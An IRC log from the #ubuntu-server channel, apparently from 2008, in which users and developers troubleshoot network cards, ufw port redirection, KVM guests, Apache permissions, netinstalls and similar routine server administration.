<trashguy> see if he sees any ethernet controller
<Kapli> is that a command?
<trashguy> lspci
<Kapli> omg he wrote "if config" now he doesnt know where he is
<trashguy> u can do it anywhere
<trashguy> lspci
<trashguy> hit enter a few time space out the prompts
<Kapli> it says command not found he says :S
<trashguy> lspci
<trashguy> What ver are you running?
<Kapli> ubuntu server
<Kapli> the latest
<trashguy> hrm
<Kapli> however he says lsusb worked
<trashguy> might help if ur ethernert controller was usb :/
<Kapli> its not :/
<Kapli> well how come  lspci is giving command not found :S
<trashguy> i have no idea
<trashguy> maybe your path is fucked?
<trashguy> try /bin/lspci
<trashguy> lol
<trashguy> but that would make no sense
<Kapli> no such file or directory
<trashguy> lol
<trashguy> /usr/bin/lspci
<Kapli> same error
<Kapli> :S
<trashguy> i dunno what to say man
<trashguy> did the server not boot up correctly?
<Kapli> i dont know
<Kapli> how can i know if it starts up correctly or not
<Kapli> look for errors in the startup?
<trashguy> lokoa orund in /var/log
<Kapli> too difficult i think
<Kapli> since im on phone and i cant see it and stuff and my dads english = shit
<trashguy> couldalso look at dmesg
<trashguy> see if you see anything for your nic
<Kapli> what do u mean by my nic
<trashguy> network interface card
<Kapli> he cant find anything with network in there, i think my network card name is SiS something.. but he cant find anything by it
<trashguy> maybe go in tot he bios and see if it got disabled or something :/
<Kapli> how
<Kapli> i dont understand how a reboot made all this trouble :S
<Kapli> but considering that ifconfig
<Kapli> doesnt return anything
<Kapli> at all
<Kapli> what does it indicate
<trashguy> something is wrong lol
<Kapli> but what is wrong
<Kapli> or wrong with what
<Kapli> the network card?
<trashguy> is it an onboard?
<Kapli> i think so yes
<trashguy> go in to bios and see if its enabled
<Kapli> oh i see
<Kapli> hm he says that behind the computer
<Kapli> where the network cable is plugged in
<Kapli> the light is yellow
<Kapli> isnt it usually green
<Kapli> or no maybe its supposed to be yellow i dont know
<trashguy> i dunno
<jdstrand> Fenix|work: can you try:
<jdstrand> http_proxy="http://proxy:80" elinks -dump http://www.google.com
<jdstrand> Fenix|work: basically, I took a stock ufw installation running only ssh, and did:
<jdstrand> *nat
<jdstrand> :PREROUTING ACCEPT [0:0]
<jdstrand> -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 22
<jdstrand> COMMIT
<jdstrand> in /etc/ufw/before.rules, then did 'ufw default allow; ufw disable ; ufw enable'
<jdstrand> and could then successfully 'ssh -p 80 host'
<jdstrand> where 'host' is my virtual machine
<jdstrand> Fenix|work: yes, the logging still shows 'UFW BLOCK INPUT', which is because of the TODO item I mentioned earlier (I'll file a bug btw)
<jdstrand> but it all actually works
<Fenix|work> I've been doing some testing as well, and yes it all works
<Fenix|work> now my only problem is squid handling windows update requests
<Fenix|work> which I think I just fixed
<Kapli> trashguy he says theres some weird errors or sometihng on startup it says something eth0 then rs packet error something
<Kapli> something loads of weird stuff
<Kapli> think it might be something?
<trashguy> yes
<Kapli> im afraid what us aid at the beginning might be right
<Kapli> i restarted it and the network card or the pc or whatever some of the hardware is malfunctioning
<Kapli> i guess ill have to buy a new server
<slicslak__> i need to add a second ip address.  i'm assuming editing /etc/network/interfaces and restarting networking is still the way to go?
<Kapli> the one i use is just my old computer its like 6 years old
<trashguy> consumer hardware is known to fail
<trashguy> you might be able to get by adding a pci ethernet controller
<Kapli> i will try
<Kapli> with another network card
<Kapli> but how do i go forward with that
<Kapli> add it and what to do
<trashguy> id disable
<trashguy> the onbaord in the bios
<Kapli> like how to install drivers and stuff
<trashguy> typically the autodetect
<trashguy> especially if its an intel
<Kapli> its asus
<trashguy> https://wiki.ubuntu.com/HardwareSupportComponentsWiredNetworkCards
<Kapli> asus isnt there :/
<trashguy> prob dif chipset?
<trashguy> just liek asus makes
<trashguy> nvidia stuff
<Kapli> i dont know
<Kapli> its a ASUS Wireless PCI Card 11b/g Retail (WL-138g V2) i have that i can try on it
<trashguy> ...
<trashguy> oh
<trashguy> wireless
<Kapli> well i dont need to use the wireless do i
<trashguy> https://help.ubuntu.com/community/WifiDocs/WirelessCardsSupported
<Kapli> haha, my card is actually there
<Kapli> well whatever im so confused at the moment
<Kapli> ill postpone it until i go there myself and can look into it myself
<trashguy> i dont generally use wireless for anything but laptops and smart devices
<Kapli> thanks for all the help
<trashguy> np
<Kapli> i will be back when im there :D
<Kapli> have been thinking about buying a proper server from like dell or something anyway
<Kapli> only thing is that ill have to do all the install and config and shit again :(
<Kapli> anyways bye bye :)
<trashguy> i dont think he knew what nic ment
<Fenix|work> jdstrand, ftp doesn't seem to be working
<jdstrand> Fenix|work: ftp will likely be problematic due to how it uses ports
<jdstrand> Fenix|work: I don't have the fix for it, but imagine passive connections are the way to go
<Fenix|work> jdstrand, understandable... but if the firewall should be blocking nothing.
<jdstrand> Fenix|work: check the squid docs for transparent ftp (I'm not totally sure it's possible)
<Fenix|work> I'm avoiding squid and FTP
<Fenix|work> not really worth the effor
<Fenix|work> t
<jdstrand> Fenix|work: you had 21 redirected in one of your earlier pastes
<Fenix|work> D'oh
<Fenix|work> how can I use ufw to find out which ports are disabled?
<jdstrand> Fenix|work: which ports are disabled?
<Fenix|work> how do I find out which ones are disabled
<Fenix|work> besides ufw allow 21
<Fenix|work> etc
<jdstrand> ufw status
<jdstrand> 'man ufw'
<Fenix|work> Firewall loaded
<jdstrand> Fenix|work: but that only works for ufw managed ports
<jdstrand> Fenix|work: right now, you'll have to do iptables -L -n...
<jdstrand> to see all the stuff you added in before.rules
<jdstrand> (this is also documented in the man page)
<Fenix|work> jdstrand, ugh... I've fubar'ed this. :(
<Fenix|work> ufw isn't working as a gateway
<Fenix|work> I removed everything and now have a stock ufw and it isn't working
<Fenix|work> I'm reading the ufw serverguide ... makes the assumption that it's multi-nic
<frith> why is it now the default not to send the hostname in dhclient?
<kirkland> mathiaz: jdstrand: I see both of you commented on https://bugs.launchpad.net/ubuntu/+source/kvm/+bug/219326
<uvirtbot`> Launchpad bug 219326 in kvm "a reboot issued from the guest shutdowns the guest instead of rebooting it" [Undecided,Confirmed]
<kirkland> mathiaz: jdstrand: can either of you reproduce this?
<kirkland> mathiaz: jdstrand: I'm doing some kvm housecleaning of bugs, and I suspect this one has been fixed
<mathiaz> kirkland: looking at it
<mathiaz> kirkland: FYI I still have a hardy host
<kirkland> mathiaz: cool!  i'm copying over my image to a hardy machine i have now
<mathiaz> kirkland: you have to systems - one running intrepid as a kvm host and one running hardy as a kvm host ?
<nxvl> mathiaz: to or two?
<kirkland> mathiaz: i've tested hardy-guest on intrepid-host, reboot works fine
<kirkland> mathiaz: i'm now scp'ing the hardy.img guest over to my hardy-host
<mathiaz> kirkland: nxvl: 2
<kirkland> mathiaz: as soon as that scp completes, i'll test there too
<kirkland> mathiaz: if that works, i'm going to close the bug with 'Fix Released', unless someone else can reproduce the problem
<mathiaz> kirkland: hmm - I cannot reproduce it for now.
<kirkland> mathiaz: you booted what kind of guest in a hardy host?
<mathiaz> kirkland: however my current setup is slightly different as I'm not using a bridged network
<mathiaz> kirkland: hardy guest on a hardy host
<kirkland> mathiaz: i can't imagine bridged network would cause reboot to shutdown
<mathiaz> kirkland: using a logical volume with an ide bus
<mathiaz> kirkland: well - IIRC it was the kvm process that was crashing on the host
<kirkland> mathiaz: ah
<mathiaz> kirkland: so anything could trigger this crash.
<kirkland> mathiaz: okay
<mathiaz> kirkland: OTOH a couple of things have changed since then - a new hardy kernel
<kirkland> yeah
<mathiaz> kirkland: the kernel guest may not be crashing the kvm host process anymore
<kirkland> mathiaz: right.  it seems that's worthy of re-testing
<mathiaz> kirkland: hm - I wasn't able to reproduce that bug.
<mathiaz> kirkland: you can mark it Fix Released AFAICT
<kirkland> mathiaz: cool, thanks.
<kirkland> mathiaz: i couldn't reproduce it on hardy either
#ubuntu-server 2008-09-23
<giovanni> hello!! there i need Help in IPTABLES rules, so i put "iptables -A INPUT -j DROP", how can i remove this rules ? :-]
<mathiaz> giovanni: iptables -D INPUT -j DROP
<mathiaz> giovanni: -A -> Append ; -D -> Delete
<giovanni> danke!
<tacone> what's the best way to detect ssh servers in the local network ?
<mathiaz> tacone: use nmap
<hads> nmap would be
<tacone> server don't normally run avahi, right? :)
<hads> nmap -p 22 192.168.0.0/24
<tacone> ok. another quick question, may I '
<tacone> ?
<mathiaz> tacone: sure
<tacone> (we're working on ssh for rapache)
<tacone> 1 linux box may be connected to more than 1 local network at the same time, right ?
<hads> Yup
<tacone> I need a way to detect what the localnetworks are. I'd use ifconfig. is there a less output command ?
<tacone> what's the best practice ?
<hads> In a bash script or...?
<tacone> we use python, but use shell commands very often.
<tacone> so a shell command would be ok.
<hads> In the shell you could use `ip`, the output may be easier to parse than ifconfig. There's probably a pythonic way to do it though.
<mathiaz> tacone: ifconfig | grep 'inet addr' | cut -d: -f2 | cut -d\  -f1
<tacone> ok, I'll look into ip..
<tacone> ops
<tacone> :)
<tacone> thank you.
<mathiaz> tacone: ^^ that gives a list of ip that are configured on the system
<mathiaz> tacone: the last cut command is: cut -d\  -f1
<tacone> right
<mathiaz> tacone: which two spaces after \
<tacone> right, I got it
<tacone> copy paste never fails ;-)
<tacone> thank you very much for your help
<hads> Here's a snippet too; http://lists.apple.com/archives/macnetworkprog/2008/Feb/msg00071.html
<hads> Which is just parsing output so not difference/point
<tacone> right.
<tacone> I'll try each :-)
<tacone> thanks !
<flyback> anyone tried to roll their own kernel for 6.06.2lts
<antdedyet> testing...
<Blaenk> hey guys why is it that when I ln -s a folder in my home directory to my htdocs folder and I access it I get a 403 forbidden error? stupid question I imagine
<henkjan> Blaenk: access rights. apache runs as www-data. www-data has no accessrights on your home folder
<Blaenk> henkjan: ohhh okay, how may I add them to this particular folder henkjan ?
<Blaenk> say it's /home/me/mypictures
<Blaenk> of course I did ln -s mypictures /path/to/htdocs but that didn't work
<Blaenk> I would /really/ appreciate any help
<Blaenk> mypictures is even chmod 777
<vk5foss> Blaenk: why symlink it like that?
<Blaenk> because I'm a noob, and that's the only way I imagined I could do it
<vk5foss> Blaenk: read up on 'userdir' and 'public_html'
<Blaenk> henkjan says I must give www-data access rights to the folder but I can't remember how
<vk5foss> and *do not ever* let www-data write to your home directory
<vk5foss> and *do not ever* set your home directory 777
<Blaenk> it's not
 * antdedyet wonders what the Ubuntu Server Guide looks like these days
<Blaenk> vk5foss: where is the public_html folder?
<Blaenk> I only see htdocs
<Blaenk> okay so basically, all I want to do is expose a folder in my home directory to my site so that I can download things off of it (documents)
<vk5foss> Blaenk: and basically, i'm telling you not to.
<vk5foss> 15:53 < vk5foss> Blaenk: read up on 'userdir' and 'public_html'
<Blaenk> ah apache2.conf
<Blaenk> or no wait this thread's 3 years old
<vk5foss> ~ping
<Blaenk> where can I find the file where I put the UserDir directive?
<vk5foss> !ping
<ubottu> ping yourself ;-) really the diodes all down my left side are sore
<vk5foss> !serverguide
<ubottu> The Ubuntu server guide may be found at http://help.ubuntu.com/8.04/serverguide/C/
<antdedyet> Blaenk: you may prefer the apache2-doc package for reference material on userdir.
<Blaenk> so aside from being insecure, is it just not possible to do what I mentioned?
<vk5foss> sure, its possible
<antdedyet> Blaenk: it's not a recommended practice that you would ever want to exhibit in a public internet environment due to various concerns, basically. :)
 * antdedyet reiterates
<Blaenk> well honestly this directory, this server in fact is just meant for this
<Blaenk> it's not my home computer or anything
<Blaenk> please, if you would be so kind, how can I do this? all security risks aside
 * vk5foss lets antdedyet handle this - i'm about to breach the CoC i suspct ...
 * vk5foss not here
<antdedyet> Blaenk: We don't provide the rope for anyone... :)
 * antdedyet heads off in search of liquid refreshment... brb
<kraut> moin
<flyback> how do I enable root logins
<stka> hi
<stka> I'm looking for thomeone who can build neu pakages for bind9 and dhcpd WITH ldap-support. I have writen a workshop for LDAP, so far I use suse but I would like to switch tu ubuntu-server, but the bind9 and the dhcpd is not linked against ldap, but I like to put the infos for dhcpd and bind9 into the ldap-tree.
<antdedyet> stka: perhaps you will be interested in the ldap2dns and ldaptor-utils to see if they provide the functionality required for your environment
<stka> antdedyet: are these special pakages?
<antdedyet> both packages can be found in ubuntu 8.04.1
<stka> ok I'll take a look
<antdedyet> just after 3am... I may be sleeping soon.
<stka> ok
<stka> antdedyet: but it is not what I'm looking for. I will put all the zone-infos and configuration in the ldap-tree
<stka> the same with dhcp. All infos about reservations ans configuration for the clients should be in the ldap tree. There are patches for bind and dhcpd but I'm no programmer, I work with networks, I tried it by my self to patch bind and dhcp but I didn't get it running :-(
<stka> with ldap2dns there ist still a ascii file withe the zone infos. The tool generates the files. With the patched bind you can use ldap diectly without any ascii file
<antdedyet> Just a suggestive solution that happen to be available. I personally have reserverations about ldap being able to fulfill the capacity of nameservers I manage, but that's only speculative word of mouth and light experience application with ldap (read: possible FUD)
<antdedyet> IIRC, directory reads would probably be within reasonable range of performance of the dns servers, but writes wouldn't. Which yep ... is what you want to do. However, I'm not versed in the available patches or native ldap linkage in bind9, nor do I have enough motivation to provide a patched package yet. :)
<stka> no problem antdedyet I'm searching for someone who is interested and can help me. Ehat I can't understand is, that none of the developers od bind puts ldap support nativ into bind9. Many admins like to put all nds and dhcp infos into ldap.
 * antdedyet guesses that someone may have not volunteered to write ldap communicating code into bind9 yet ... not an informed opinion thru, straight outta the ether. :)
<stka> the patch is available for bind and dhcpd, I think it's not a big deal to put this in the package
<antdedyet> stka: but you were not able to patch it?
<stka> patch was not the problem but I didn't get it build
<stka> as I said, I'm no programmer
<stka> this is the old patch http://www.venaas.no/ldap/bind-sdb/old.html I can't reache the new page http://bind9-ldap.bayour.com/
<stka> here ist the dhcpd patch http://home.ntelos.net/~masneyb/
<penper> hi! I'm about to order a VPS solution. If I ask them to install Ubuntu Server, will I be able to ssh into it considering that all ports are blocked by default? Thanks :)
<ghaleb_> hello, how can I know the version of a package before I install form apt ?
<hads> penper: If all ports are blocked then all ports are blocked so, no.
<hads> ghaleb_: aptitude show package
<ghaleb_> hads: I'm trying to use it :D .. still can't search for a package to get description or sth
<penper> hads: I asked because I imagined this was a common problem with Ubuntu Server, so maybe there was a solution for it? Maybe an option I need to ask them to set during the install or something
<ghaleb_> hads: thank you I got it :)
<hads> penper: Ubuntu won't block ports by default
<penper> aha, ok... thanks
<henkjan> soren: planet.ubuntu.com doesnt like the html tags in your blogpost
<soren> henkjan: Oh, thanks for the pointer.
<soren> henkjan: S
<soren> henkjan: There. Should be fixed with next update. Thanks again!
<henkjan> soren: np :)
<henkjan> my little help to ubuntu-server :)
<nxvl> soren: souldn't ubuntu-vm-builder be removed from the repos?
<soren> nxvl: When vmbuilder fully replaces it, yes.
<nxvl> oh
<nxvl> ok
<nxvl> :D
<zul> soren: please add python-cheetah to the build-deps :)
<nxvl> btw
<nxvl> i'm quite confused about the meeting date
<zul> which meeting date?
<nxvl> it says Tuesday, 22nd of September
<nxvl> zul: server team meeting
<nxvl> we are on Tuesday and the 22nd was yesterday :S
<zul> nxvl: mathias might have not been awake when he sent that im pretty sure its today :)
<nxvl> :D
<zzgvh> Hi all. I'm new here and somewhat of a ubuntu newbie too. So pls bear with me if I ask "stupid" questions. I'm struggling with kvm, trying to get a hardy server host running a number of hardy server guests. Anyone here willing/able to try help me? No use going into a long problem description if no one's listening ;-)
<Shanix> zzgvh, try to take a look here: https://help.ubuntu.com/community/KVM
<zzgvh> Aaanyway, I'll make a long story short. I have managed to set up a guest using ubuntu-vm-builder. It is on a static IP number using the community docs bridge setup. So my problem is that when using virt-clone I cannot connect to the clone. It would seem to me that if I can ssh to the original guest, then I should be able to ssh to the clone on the same IP, when that is the only guest running of course.
<zzgvh> Shanix: thanks...I have been there, and it's gotten me tis far (with a lot of googling to of course) but it's HARD ;-) Lots of things seem to be much easier if you have a desktop host. I have tried that and gotten pretty far. But I really want to try run all systems as servers.
<sommer> zzgvh: are you running the clone and the original at the same time?
<zzgvh> Nope!
<sommer> zzgvh: you might also check out: https://help.ubuntu.com/8.04/serverguide/C/libvirt.html
<zzgvh> It should have the same IP as the original, but when I try to ssh or ping it ther's nobody home
<sommer> zzgvh: it may be that the nic has a different name... eth1 instead of eth0
<sommer> zzgvh: it should be the same, but it's worth checking I guess
<zzgvh> how do I check...I have no access to the clone guest!
<sommer> zzgvh: virt-viewer -c qemu+ssh://hostname
<sommer> zzgvh: you'll need to have ssh on the host machine setup
<sommer> zzgvh: and connect from another client, if you don't have a gui on the server
<zzgvh> ah...ya, because the host is a server too.
<ogra> the clone will definately name it differently since eth0 in 70-persisent-net.rules will be bound to the originals MAC
<ogra> unless you hve the same MAC in the clone :)
<nxvl> mathiaz: here you are
<sommer> ah, thanks ogra
<nxvl> mathiaz: good morning
<zzgvh> ok, I'll try and see if I can access from a desktop machime
<nxvl> mathiaz: i was asking here for the date of the meeting, since in your e-mail it says: Tuesday, 22nd of September
<nxvl> we are on Tuesday and the 22nd was yesterday
<mathiaz> nxvl: right - it's today
<nxvl> mathiaz: :D
 * nxvl HUGS mathiaz 
<uvirtbot> New bug: #273425 in apache2 (main) "It's better to have a sub-directory in /var/www for default web files" [Undecided,Invalid] https://launchpad.net/bugs/273425
<uvirtbot> New bug: #244801 in samba (main) "pam_smbpass(kscreensaver:auth): unrecognized option [missingok]" [Low,New] https://launchpad.net/bugs/244801
<zzgvh> sommer: So I managed to get access to the clone! Thanks. I will continue looking at ogra's suggestion regarding the MACs.
<sommer> party!
<thefish> anyone know if there is anything like a free as in beer landscape server in the pipeline? (like spacewalk for rh)
<uvirtbot> New bug: #273486 in ebox (universe) "Current eBox packages in intrepid don't work at all" [Undecided,New] https://launchpad.net/bugs/273486
<hackeron> hey, I'm using basic auth in a vanilla installation of ubuntu-server and all my passwords are truncated to 8 characters. I can have a password set to 01234567890 and login with 01234567anything - any ideas?
<hackeron> basic auth in apache2 that is
<zzgvh> Ok, looks like I figured this out. Thanks a bunch, I might very well be back! ;-)
<tuxcrafter> hello everybody, why is the CONFIG_NF_CONNTRACK_SANE is not set on the 2.6.24-19-server kernel
<tuxcrafter> compared to my debian server with kernel 2.6.22-3-686 that has the module build ...
<tuxcrafter> is there a nice solution for this?
<ivoks> i'm too late, right? :/
 * tuxcrafter got to go
<sommer> for the meeting?
<tuxcrafter> will be back to ask again if possible
<ivoks> sommer: yes
<sommer> ivoks: yep, it's over :)
<ivoks> i just can't make it at that time :/ that's still working hours here, so i'm usualy at the meetings
<sommer> ah, meetings are awesome
<ivoks> specially whern you are talking with someone who doesn't have a clue about what you are talking about
<ivoks> like most of my meetings :/
<sommer> heheh... been to a few of those meetings myself
<nxvl> kirkland: http://tombuntu.com/index.php/2008/09/23/encrypted-private-directory-in-ubuntu-810/
<leonel> is  postgresql 8.3.4 going it's way to  Hardy ???
<nxvl> leonel: hardy is stable release, so i think no
<kirkland> nxvl: cool
<leonel> nxvl: https://wiki.ubuntu.com/StableReleaseUpdates/MicroReleaseExceptions  <-- that's why I asked  since the last postgresql  did
<nxvl> you can always ask for an sru
<leonel> not that I need 8.3.4   just asking  if there was a work in progress since  las time piti did it that's all
<zul> well ask pitti then
<jkakar> soren: Heya!  I just noticed your blog post about vm-builder.  Is there a Bazaar branch with the code somewhere?  I didn't find a vm-builder project on Launchpad.
<zul> launcpad.net/vmbuilder
<jkakar> zul: Thanks!
<hubuntu> hello... I have a Hardy server and have used apt to install drupal. NOw I want several instances of drupal in my server (/server/drupal1 and /server/drupal2 let's say)
<hubuntu> it's that possible? And if so, how?
<psufan> how do I absolutely ensure that a kernel option is always executed on bootup
<psufan> DO NOT ARGUE, DO NOT REMOVE WHEN DOING KERNEL UPDATE, ETC ETC, F*** OFF
<psufan> config option :)
<antdedyet> psufan: grub's docs will provide the information you're looking for.
<psufan> I did check those before
<psufan> didn't do shit for me
<mathiaz> psufan: have a look at /boot/grub/menu.lst
<mathiaz> psufan: there is a whole section about adding kernel parameters to the grub command line
<psufan> I do
<psufan> and it ignores them
<sommer> are you sure  you're placing them on the right line?
<psufan> I placed them everyone
<psufan> the only time it works is if I set.....
<psufan> oh
<psufan> damn
<psufan> hang on
<psufan> this might explain this and some other problems too
<psufan> serial console bug
<psufan> yep
<psufan> the only time it works is if I go to the kernel line option in grub
<psufan> and make it the first option
<psufan> i'm just going with a stock solaris install and filesystem but thx
<psufan> opps wrong channel
<psufan> so anyways
<psufan> does ubuntu use some kind of weird serial libary
<psufan> seems to have terminal problems
<psufan> i'm not taking ubuntu off my servers
<psufan> the solaris is for the nas :P
<uvirtbot> New bug: #273731 in bacula (universe) "no se que contraseÃ±a me piden y por que si es un paquete de sinapsy Â¿acaso no son libres?" [Undecided,New] https://launchpad.net/bugs/273731
<nxvl> kirkland: ping
<kirkland> nxvl: pong
<nxvl> kirkland: i've just send you and e-mail
<kirkland> nxvl: i got it
<nxvl> ok
<nxvl> :D
<kirkland> nxvl: i'll take a look once i'm done with this hal issue that's been driving me crazy
<kirkland> thanks
<nxvl> kirkland: bug number?
<kirkland> nxvl: not sure... just a big annoying issue.  must bin in kvm group to use kvm.
<nxvl> i'm anoyed because i can't use the arrows on kvm
<nxvl> so i can't install a debian system to test some stuff
<nxvl> but i remember that soren said that it's not needed to be in the kvm group to use it anymore
<nxvl> soren: or i was dreaming?
<kirkland> nxvl: you can try giving kvm -k option
<kirkland> nxvl: i use -k en-us for my keyboard
<kirkland> nxvl: i don't know what yours would be
<nxvl> it's en-us, it's anoying to try to develop using a spanish keyboard
<nxvl> \o/ it worked
 * nxvl HUGS kirkland 
<kirkland> nxvl: ;-)
#ubuntu-server 2008-09-24
<flyback> http://arstechnica.com/news.ars/post/20080923-bad-seed-isp-atrivo-cut-off-from-rest-of-the-internet.html <--- YOU GO TO HELL AND YOU DIE!
<FFEMTcJ> does anyone know what package i need to install to take ubuntu server back to its default state?
<emgent> zul: around ?
<antdedyet> hey dendrobates
 * antdedyet heads home, bbiab
<emgent> un there is a critial bug in hardy mysql-server
<emgent> s/critical/critical/
<sommer> kirkland: ping
<sommer> kirkland: just fyi, I filed a pkgsel bug #273823
<uvirtbot> Launchpad bug 273823 in pkgsel "pkgsel can't find unattended-upgrades" [Undecided,New] https://launchpad.net/bugs/273823
<stweston> Does anyone know any commands to use for installing Ubuntu Server thru the Shell?
<stweston> because I don't have a CD-R drive that works under the Linux kernel.
<stweston> I mean, it boots the CD fine, but nothing works right after loading the linux kernel and it tries to detect the CD-R drive.
<Adoleo> stweston: There's a tutorial out on Google somewhere, but I tried it and it was not easy
<stweston> oh?
<Adoleo> Do you have a USB-key lying around anythwere?
<stweston> I have a memory card & USB adapter.
<stweston> 1GB, too.
<Adoleo> stweston: I found that to be a lot easier to deal with.  1GB is plenty
<stweston> ok
<Adoleo> stweston: Let me see if I can find the howto I used
<stweston> all right.
<stweston> Adoleo: wait - is it a liveUSB thing?
<Adoleo> stweston: Yeah, that's what I'm talking about
<stweston> Adoleo: because that's not going to work, necessarily.
<Adoleo> stweston: Won't work for you?
<stweston> Adoleo: you see, I'm on a mac, and I need the instructions up so that I don't goof.
<Adoleo> Ah - using VMware?
<stweston> Adoleo: if I boot into linux (or even re-boot, for that matter) on my mac, it doesn't work. no, it's actually VirtualBox.
<stweston> I mean, it kind of defeats the purpose, in a reverse way.
<Adoleo> stweston: Okay, I've got some experience with Virtualbox.  You can actually mount the .iso directly from the hard drive with VirtualBox.  You're talking about installing Ubuntu into a virtualized Virtualbox environment, right?
<stweston> no.
<Adoleo> stweston: Okay, I'm confused then.  :-)
<stweston> I'm talking about installing ubuntu server (or xubuntu) onto another machine, which doesn't have a good cd-r drive.
<stweston> I have the cmd line up and everything for server.
<stweston> but it's just on the CD
<Adoleo> stweston: Okay, now I'm starting to understand.  Are you looking for a way to install Ubuntu over your network connection, then?
<stweston> I DO, however, have an ethernet cable.
<stweston> I suppose...
<stweston> the box doesn't have wi-fi, but I've got ethernet hooked up
<stweston> and the mac has wi-fi
<Adoleo> stweston: Okay, then this is what I was thinking of initially.  A netinst is not pretty, but it's possible.
<stweston> okay
<stweston> I think I understood that when I first tried... LOL
<stweston> but I'm not even sure if I got the first step
<stweston> =)
<Adoleo> stweston: I'm looking for the tutorial I tried before.
<stweston> all right
<Adoleo> stweston: Is your server box operational on the network - does it have a working operating system right now?
<stweston> it has Windows 98, but it doesn't work w/ the ethernet for some reason.... can't find the driver.
<stweston> and w/o wi-fi, it doesn't work for sure.
<stweston> I mean, it for sure doesn't work.
<Adoleo> stweston: Okay, this is definitely not going to be easy without a working CD drive.  You can do a netinst from an SSH connection, but that's only if another version of Linux is already installed.
<stweston> hm...
<stweston> nope. I have ubuntu on a VM on my mac, tho
<Adoleo> stweston: Have you tried re-burning the install disc in case there were errors on the media?  I've had that problem before.
<stweston> I have - many times - for both server and xubuntu.
<Adoleo> stweston: That's good that you have Ubuntu on the mac, but without something to connect to on the server machine there's not much to work with.
<stweston> aah
<stweston> what do you mean?
<stweston> the ethernet is plugged in on the PC, and with linux, it might even have the right drivers.
<Adoleo> stweston: Okay, let me switch gears then.  On your server PC, are you able to get far enough in the installation to reach the console?
<stweston> yes
<stweston> I'm there already, in fact.
<stweston> you mean the ~ #?
<Adoleo> stweston: Okay, do you know if it has a working net connection?  Can you ping a random site like Yahoo.com?
<stweston> not sure... don't know how
<stweston> I'm new to linux, kinda.
<Adoleo> stweston: Got it, we all have to start somewhere.  :-)  Try this in the command line: ping yahoo.com
<stweston> okay
<Adoleo> After it hits yahoo.com a few times, hit CTRL+C to stop it
<stweston> okay
<stweston> "host name lookup failure"
<Adoleo> Okay, no net connectino.
<stweston> so, there isn't a connection... yeath
<stweston> yeah*
<stweston> how would I find the ethernet card?
<stweston> I just installed it today, so that might be a problem.
<Adoleo> That's an automatic part of the installation, but it needs to load some packages before that works.  If it can't access the CD, then it can't access those packages.
<stweston> aah
<stweston> well, I'll go back to prompt F1, then...
<stweston> the error there is "no common cd-rom drive was detected"
<stweston> ... you may need to load drivers form a driver floppy.
<stweston> so, is that a problem?
<Adoleo> stweston: Yeah, that's definitely it.  Got a few extra dollars to buy a new CDR?  :-)
<stweston> not exactly... more in the negative many extra dollars.
<stweston> I still need to pay back my mom for some purchases (she has all my money, and I'm still a kid)
<stweston> well, I'm a teenager, but that's kind of a kid.
<stweston> I mean - she has access to all my money.
<Adoleo> stweston: :-)  Got it.  We've all been there.
<stweston> LOL
<Adoleo> stweston: Got some floppy disks lying around?
<stweston> yeah. why? I don't know how to load them if I just have my mac and a semi-functional win 98.
<Adoleo> stweston: I might be able to find a good tutorial
<stweston> okay
<stweston> well, that's useful
<Adoleo> stweston: Here we go - with this tutorial, you first install Debian using floppies, and then use that to install Ubuntu
<Adoleo> https://help.ubuntu.com/community/Installation/WithFloppies
<Adoleo> stweston: Since you're still learning Linux, though, you'll probably have to try this one a few times before it works.  Make sure to set aside a few hours and expect it to break a few times.
<stweston> wait - do I need to use the floppies in win98 or what?
<stweston> okay
<Adoleo> stweston: Does your mac not have a floppy drive?
<stweston> no. it's a new MacBook
<Adoleo> stweston: lol - you're hitting roadblocks at every turn
<stweston> not even a PS/1 port
<stweston> LOL. I know
<Adoleo> stweston: I hate to tell you this, but you might want to wait until you can get a hold of a replacement CD-ROM drive.
<stweston> all right. that's what others have said, too.
<stweston> thanks for the help, anyway! I just got a reply for a forum topic about drivers for this CD drive!!
<Adoleo> stweston: Nice - hopefully that will turn out to be a good lead.  Good luck
<stweston> yup
<stweston> thanks!
<stweston> 1 final note, tho
<stweston> these people in the Ubuntu community are REALLY helpful
<Adoleo> stweston: I'm glad to hear it!  I think we're all just thrilled that we get this fantastic software for free, and we all want to pay it forward.
<stweston> yeah
<stweston> that's sweet
<Adoleo> stweston: That's what Open Source is built on
<stweston> I know!
<stweston> see ya, then.
 * hads likes friendly people
 * Adoleo does too
<codeape> hey guys, i'm having a very bizarre problem on a fresh install of Hardy 8.04.1 -- I can ssh to my box fine, but scp simply hangs. I can't even do a basic "ssh user@host uname" - it just hangs. any ideas?
<ASASA> hellooo any one can help me???
 * ASASA any one live!!
 * Adoleo is live
 * Adoleo is breathing
 * Adoleo wants to go to bed, though.  :-)
<codeape> hopefully someone can help -- very weird SSH problem. sshing to my hardy server box works fine, I get a shell no problems; whenever I try to SCP or include a command as an argument (ie ssh user@host uname), it simply hangs and doesn't do anything
<Theban> I'm installing phpbb2 on my Ubuntu Server 8.04 and it's stopped on "Creating MySQL tables if they don't exist yet"
<Theban> it's created 30 tables and isn't doing anything anymore
<Theban> thoughts?
<Ergo^> hello
<Ergo^> ï»¿hello, i needed to send mail from my server via smtp (mailboxes are handled by google), so i installed postfix, i chose "internet site" during setup do i need to configure it further, so its secure , or can i leave it as it is now after install ?
<kgoetz> Theban: how are you installing?
<Theban> sudo aptitude install phpbb2
<Theban> i have no gui what-so-ever
<kgoetz> Ergo^: thought about something like ssmtp? If the bugs dont worry you, its nice and small
<Ergo^> kgoetz: well id rather stick with more "standard" solutions for now.
<kgoetz> Theban: so im following you - apt has still not returned you to your CLI?
<Theban> CLI?
<kgoetz> Theban: command line
<Theban> ah yes
<Theban> it's just stopped
<chmac> Is there a standard command that works across all distros to figure out what distro you're on?
<Theban> O_O
<Theban> good question
<chmac> Theban: :)
<scuser> hi all, I'm using ubuntu 8.04 and I want to install login.kbr5, does anyone know which package should I install ?
<soren> krb5-rsh-server
<kraut> moin
<scuser> soren:  ok done, how can I use it ?
<soren> scuser: What do you mean?
<scuser> soren: I mean that I've created some users such as admin/admin and I want to authenticate them using kerberos
<slangasek> authenticate them remotely, or locally?
<Theban> when i type something like a command with --help and it shows a bunch of info
<Theban> how can i see it so i don't miss the top of it
<Theban> gets cut off
<soren> Theban: "something --help | less"
<scuser> slangasek: locally
<_ruben> use shift-pageup to scroll up? :)
<chmac> Theban: You mean how do you see the whole screen? You can't scroll?
<slangasek> scuser: typically one uses pam_krb5 for that
<Theban> i have no gui
<slangasek> i.e., the libpam-krb5 package
<Theban> need to see it by page or soemthing
